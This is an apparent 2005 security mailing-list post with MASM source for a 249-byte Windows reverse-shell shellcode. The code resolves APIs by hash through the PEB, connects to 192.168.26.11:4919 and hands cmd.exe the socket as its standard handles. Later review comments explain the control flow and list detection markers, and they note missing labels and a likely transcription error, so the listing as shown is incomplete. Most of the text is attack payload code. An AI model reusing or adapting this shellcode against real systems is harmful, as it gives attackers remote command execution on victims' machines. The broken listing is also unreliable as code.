
249bytes reverse shellcode with "nooil tricks methods"

From: msuiche () gmail com
Date: 14 Aug 2005 22:42:14 -0000

We use the PEB to reach the standard Input/Output/Error handles.

typedef struct PEB
BOOLEAN InheritedAddressSpace ;
BOOLEAN ReadImageFileExecOptions ;
BOOLEAN BeingDebugged ;
HANDLE Mutant ;
PVOID ImageBaseAddress ;
PPEB_LDR_DATA LoaderData ;
ULONG MaximumLength ;
ULONG Length ;
ULONG Flags ;
ULONG DebugFlags ;
PVOID ConsoleHandle ;
ULONG ConsoleFlags ;
HANDLE StdInputHandle ; +18h
HANDLE StdOutputHandle ; +1Ch
HANDLE StdErrorHandle ; +20h

So with the "nooil tricks" we now have:
; Same handle redirection as the "nooil tricks" block in the full listing
; below: walk TEB -> PEB -> ProcessParameters and overwrite the three stored
; standard handles in place, so a child started by system() inherits the
; socket without importing SetStdHandle.  The +18h/+1Ch/+20h offsets are the
; ones given in the struct listed above (labelled "PEB" there).
; (The space in "fs :[" / "ds :[" looks like archive reformatting.)
mov eax,dword ptr fs :[18h]             ; fs:[18h] = TEB self pointer
mov eax,dword ptr ds :[eax+30h]         ; TEB+30h = PEB
mov eax,dword ptr ds :[eax+10h]         ; PEB+10h = ProcessParameters
mov ecx, hClientSocket                  ; hClientSocket = the connected socket (placeholder name)
mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD_INPUT_HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD_OUTPUT_HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD_ERROR_HANDLE,hClientSocket) ;

249-byte generic reverse shellcode, without loader (no null bytes):

comment *
---- New generation shellcode using my "nooil tricks" methods ---
----    (c) 2005 - Matthieu Suiche / msuiche () gmail com        ---
249 bytes Reverse Generic Shellcode without loader(no null byte)
hehe hi metasploit's guys ;)
(review note: the "*" that closes this MASM "comment" block is not present
in the archived copy; as shown, everything down to the first "*" in the
code would be treated as comment text.)
.model flat, stdcall

assume fs:nothing                       ; fs: is used below for TEB/PEB access (fs:[18h], fs:[30h])

; Export-name hashes consumed by the resolver in the listing below.  Each
; value is the sum of the first two little-endian dwords of the ASCII export
; name (the resolver does "mov esi,[edi] / add esi,[edi+4]"), so only an
; 8-byte window matters: 'Load' + 'Libr' = 64616F4Ch + 7262694Ch = 0D6C3D898h.
; For names shorter than 8 bytes the window runs past the terminator into
; whatever follows in the module's export name table.
LoadLibraryA    equ 0D6C3D898h
WSAStartupA     equ 0C7B3B4CBh          ; 'WSAS' + 'tart' (export "WSAStartup"; the trailing 'A' plays no part)
WSASocketA      equ 0B8ACB6C6h          ; 'WSAS' + 'ocke'
connect                 equ 06EE2D2C8h  ; 'conn' + 'ect\0' (8th byte is the terminator)
system                  equ 0E873E6D8h  ; 'syst' + 'em' alone gives 7473E6D8h; the top byte (E8h = 74h+74h) comes from
                                        ; the first byte of the next name in msvcrt's export table, so this value
                                        ; depends on that table's layout
ExitProcessA    equ 0D7D8EA95h          ; 'Exit' + 'Proc'
; ------------------------------
; Connect-back endpoint, written in the byte order it will have once pushed
; (network order):
sin_addr                equ 0B01A8C0h ; bytes C0 A8 1A 0B = 192.168.26.11
sin_port                equ 3713h       ; 4919 -- bytes 13 37 = port 1337h
; ------------------------------
str_cmd                 equ 0FF646D63h  ; bytes "cmd" + 0FFh; the 0FFh becomes the terminator at run time (see "inc byte ptr [esp+3]")

; ----------------------------------------------------
; ----------------------------------------------------------------------
; _nooil_ : position-independent reverse-shell payload (32-bit Windows,
; MASM syntax).  What the visible code does, in order:
;   1. GetPC idiom (jmp / call / pop) leaves edi = address of the export
;      resolver; every later "call edi" is a lookup.
;   2. Resolver: eax = module base to search (0 => obtain a base by walking
;      fs:[30h] -> PEB -> Ldr -> init-order module list), then scan that
;      module's export names for the caller-supplied 8-byte hash.
;   3. LoadLibraryA("ws2_32"), WSAStartup, WSASocket, connect to sin_addr:sin_port.
;   4. LoadLibraryA("msvcrt"), resolve system.
;   5. Overwrite the three standard handles stored in the process
;      parameters block with the socket, then system("cmd"), ExitProcess.
; Markers useful for analysis/detection: fs:[18h]/fs:[30h] TEB/PEB reads,
; export-table walk by hash, direct writes to the ProcessParameters std
; handle fields, and a child cmd.exe whose std handles are a socket.
; NOTE(review): the label lines (_eip, EntryPoint, GetEip, MyGetProcAddr,
; FindAddr, AddrFound, scode) are not present in this archived copy, so the
; listing as shown will not assemble; the comments below reconstruct the
; intended control flow from the jump targets and stack offsets.
; ----------------------------------------------------------------------
_nooil_ segment public ; writable section
; ----- CODE ----- 
        jmp short _eip                  ; -> "call GetEip" below
        pop             edi             ; GetEip: edi = return address = first instruction of the resolver
        jmp short EntryPoint            ; -> "xor eax, eax" below
        call    GetEip                  ; _eip: pushes the address of the next instruction
        ; MyGetProcAddr(hash): the hash is read from [esp+36] and the result is
        ; written to [esp+28].  Those offsets correspond to a pushad-style frame
        ; (8 saved registers = 32 bytes) above the return address; the save and
        ; restore instructions are not visible in this archived copy.  Without
        ; a restore, edi (clobbered at "mov edi, [ebx+ecx*4]") would not survive
        ; for the next "call edi".
        test    eax, eax                ; eax = module base to search; 0 => locate one via the PEB
        jnz             MyGetProcAddr   ; NOTE(review): as archived this names the resolver entry itself (a loop);
                                        ; the intended target is presumably the point where a non-zero base is used
        ; eax = 0
        mov     eax, dword ptr fs:[eax+30h]       ; fs:[30h] = PEB
        mov     eax, dword ptr ds:[eax+0ch]       ; PEB+0Ch = Ldr (PEB_LDR_DATA)
        mov     esi, dword ptr ds:[eax+1ch]       ; Ldr+1Ch = InInitializationOrderModuleList.Flink
        mov     eax, dword ptr ds:[eax+08h]       ; NOTE(review): reads off eax (Ldr) rather than the list entry
                                                  ; just loaded into esi, which is otherwise unused here --
                                                  ; possibly a transcription error in the archived copy
        mov             edx, eax                  ; edx = module base
; - PE
        add             edx, dword ptr ds:[edx+3ch]       ; edx += e_lfanew -> IMAGE_NT_HEADERS
; - Export Table
        mov             edx, dword ptr ds:[edx+78h]       ; DataDirectory[EXPORT].VirtualAddress (RVA)
        add             edx, eax                          ; edx = IMAGE_EXPORT_DIRECTORY
        mov     ebx, dword ptr ds:[edx+20h]               ; AddressOfNames (RVA)
        add             ebx, eax                          ; ebx = name RVA array
        xor             ecx, ecx                          ; ecx = name index
        mov             ebp, eax                          ; ebp = module base (eax is scratch from here on)
        inc             ecx                               ; FindAddr: ++ecx (index 0 is never compared)
        mov     edi, dword ptr ds:[ebx+ecx*4]
        add             edi, eax                          ; edi = name string (this clobbers the saved resolver pointer)

        mov             esi, dword ptr [edi]            
        add             esi, dword ptr [edi+4]            ; hash = first dword + second dword of the name (8-byte window)
        cmp             esi, [esp+36]                     ; caller's hash (pushed just before "call edi")
        jz              AddrFound
        jmp             short FindAddr                    ; next name; there is no bound check against NumberOfNames

        ; AddrFound: name index -> ordinal -> function RVA -> absolute address
        mov     ebx, dword ptr ds:[edx+24h]               ; AddressOfNameOrdinals (RVA)
        add     ebx, ebp
        mov     cx,word ptr ds:[ebx+ecx*2]                ; cx = ordinal of name[ecx]
        mov     ebx, dword ptr ds:[edx+1Ch]               ; AddressOfFunctions (RVA)
        add     ebx, ebp
        add     ebp, dword ptr ds:[ebx+ecx*4]             ; ebp = base + function RVA

        mov             dword ptr [esp+28], ebp           ; store into the saved-eax slot so the caller gets the address in eax

        ; EntryPoint:
        xor             eax, eax                          ; eax = 0 -> resolver walks the PEB for its module
        xor             ecx, ecx                          ; cx = 0, used below as a string terminator
        push    LoadLibraryA
        call    edi                                                     ; MyGetProcAddr(LoadLibraryA);
        mov             ebp, eax                          ; ebp = LoadLibraryA (kept for the second load)
        push    cx                                        ; two zero bytes: terminator of "ws2_32"
        push    word ptr '23'
        push    '_2sw'                                    ; stack now reads "ws2_32\0\0" (little-endian push order)
        push    esp                                       ; lpLibFileName
        call    eax             ; LoadLibraryA("ws2_32");
        mov             ebx, eax                          ; ebx = ws2_32 base; eax (same value) is the base for the next lookup
        push    WSAStartupA
        call    edi             ; MyGetProcAddr(WSAStartupA)
        mov             esi, esp
        add             si, -301h                         ; esi = scratch area 301h bytes below esp for the WSADATA output;
                                                          ; only the low 16 bits are adjusted (keeps the code null-free),
                                                          ; so this wraps upward if (esp and 0FFFFh) < 301h
        push    esi                                       ; lpWSAData
        push    2                                         ; wVersionRequested = 2
        call    eax             ; WSAStartup(2,&WSAstruct);
        mov             eax, ebx                          ; search ws2_32 again
        push    WSASocketA
        call    edi             ; MyGetProcAddr(WSASocketA);
        xor             esi, esi
        push    esi                                       ; dwFlags = 0
        push    esi                                       ; g = 0
        push    esi                                       ; lpProtocolInfo = NULL
        push    esi                                       ; protocol = 0
        inc             esi
        push    esi                                       ; type = 1
        inc             esi
        push    esi                                       ; af = 2; esi stays 2 for the sockaddr below
        call    eax             ; WSASocket(2,1,0,0,0,0);
        xchg    ebx, eax ; ebx = sockfd , eax = ws2_32

        ; sockaddr_in built on the stack, fields pushed in reverse order
        push    sin_addr                                  ; sin_addr (offset 4)
        push    word ptr sin_port                         ; sin_port (offset 2)
        push    si                                        ; sin_family = 2
        mov             esi, esp                          ; esi = &sockaddr_in
        push    connect
        call    edi             ; MyGetProcAddr(connect)
        push    10h                                       ; namelen = sizeof(sockaddr_in)
        push    esi
        push    ebx
        call    eax             ; connect(sockfd, &struct, sizeof(struct));
        push    ax                                        ; ax = connect() result; relies on 0 (success) to act as the terminator
        push    word ptr 'tr'
        push    'cvsm'                                    ; stack reads "msvcrt" + terminator
        push    esp
        call    ebp             ; LoadLibraryA("msvcrt");
        push    system                                    ; eax = msvcrt base from the call above
        call    edi             ; MyGetProcAddr(system);

        ; ----------------------------- nooil tricks ----------------------------------
        ; Replace the standard handles recorded in the process parameters block
        ; with the socket; the cmd.exe started by system() inherits them, so no
        ; SetStdHandle import (and no extra bytes) are needed.
        xor             ecx, ecx
        mov             ecx,dword ptr fs:[ecx+18h]        ; fs:[18h] = TEB self pointer
        mov             ecx,dword ptr ds:[ecx+30h]        ; TEB+30h = PEB
        mov             ecx,dword ptr ds:[ecx+10h]        ; PEB+10h = ProcessParameters (listed above as "PEB")
        mov             dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient);
        mov     dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient);
        mov     dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient);
        ; -----------------------------------------------------------------------------

        push    str_cmd                                   ; bytes "cmd" + 0FFh
        inc             byte ptr [esp+3]                  ; 0FFh + 1 = 0: terminator without a null byte in the code
        push    esp
        call    eax     ; system("cmd");                   -- returns when the shell exits
        ; Exit
        push    ExitProcessA                              ; eax here is system()'s return value; the resolver only
                                                          ; takes the PEB path to kernel32 if that value is 0
        call    edi             ; MyGetProcAddr(ExitProcessA)
        call    eax             ; ExitProcessA();
end scode                                                 ; NOTE(review): entry label "scode" is not visible; "end" normally closes the file
; ------ END CODE ------
_nooil_ ends
; ----------------------------------------------------
